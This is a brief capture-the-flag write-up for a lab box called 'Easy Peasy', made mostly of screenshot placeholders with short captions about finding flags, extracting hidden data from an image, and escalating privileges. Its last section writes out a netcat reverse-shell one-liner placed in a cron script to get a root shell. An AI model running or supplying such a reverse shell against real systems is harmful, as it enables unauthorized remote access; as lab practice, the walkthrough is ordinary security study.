Post

Easy Peasy

Easy Peasy

Easy Peasy

Pasted image 20260527205722.png

πŸ” Initial Discovery

Pasted image 20260527213731.png Pasted image 20260527213747.png Pasted image 20260527213903.png Pasted image 20260527213958.png Pasted image 20260527214036.png Pasted image 20260527214055.png Pasted image 20260527214117.png

πŸ’» Let’s check the source of the page:

1
view-source:http://10.49.169.155:65524/n0th1ng3ls3m4tt3r/

Pasted image 20260527214146.png Pasted image 20260527214451.png

🚩 Found flag 3!

πŸ•΅οΈ Extracting the Hidden Path

πŸ’‘ Remember the hidden path containing a binary image? I extracted the data from it using the password of that hash: Pasted image 20260527215556.png

Pasted image 20260527215847.png Pasted image 20260527220051.png

⚑ Privilege Escalation

πŸ“Œ I set up a malicious script in the secret cron job path:

1
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.49.106.140 4444 >/tmp/f' > /var/www/.mysecretcronjob.sh

Pasted image 20260527224149.png

This post is licensed under CC BY 4.0 by the author.